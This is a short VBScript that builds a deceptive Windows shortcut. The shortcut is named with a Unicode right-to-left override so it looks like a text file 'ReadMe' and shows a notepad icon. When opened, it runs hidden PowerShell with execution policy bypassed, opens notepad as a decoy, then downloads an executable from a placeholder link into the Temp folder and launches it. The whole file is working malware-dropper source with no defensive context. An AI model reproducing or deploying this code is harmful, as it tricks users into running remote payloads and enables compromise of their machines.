Dim DownLoadLink, FileName
DownLoadLink = "'123456'"
FileName = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%Temp%") + "\DW.exe"

Set WshShell = CreateObject("WScript.Shell")
Set ShApp = CreateObject("Shell.Application")
unicode = Unescape("%u0052%u0065%u0061%u0064%u004d%u0065%u005f%u202e%u0074%u0078%u0074%u002e%u006c%u006e%u006b")
unicodeName = "unicode.lnk"
shortcutPath = unicodeName
Set lnk = WshShell.CreateShortcut(shortcutPath)
lnk.TargetPath = "powershell.exe"
lnk.Arguments = "-ExecutionPolicy Bypass -WindowStyle Hidden -Command notepad.exe;(new-object System.Net.WebClient).DownloadFile(" & DownLoadLink & "," & "'" & FileName & "'" & "); Start-Process -FilePath " & "'" & FileName & "'" & ";"
lnk.IconLocation = "c:\windows\system32\notepad.exe"
lnk.Description = "Type: Text Document"
lnk.Save()
Set FSO = CreateObject("Scripting.FileSystemObject")
Set file = FSO.GetFile(shortcutPath)
file.name = unicode & ".lnk"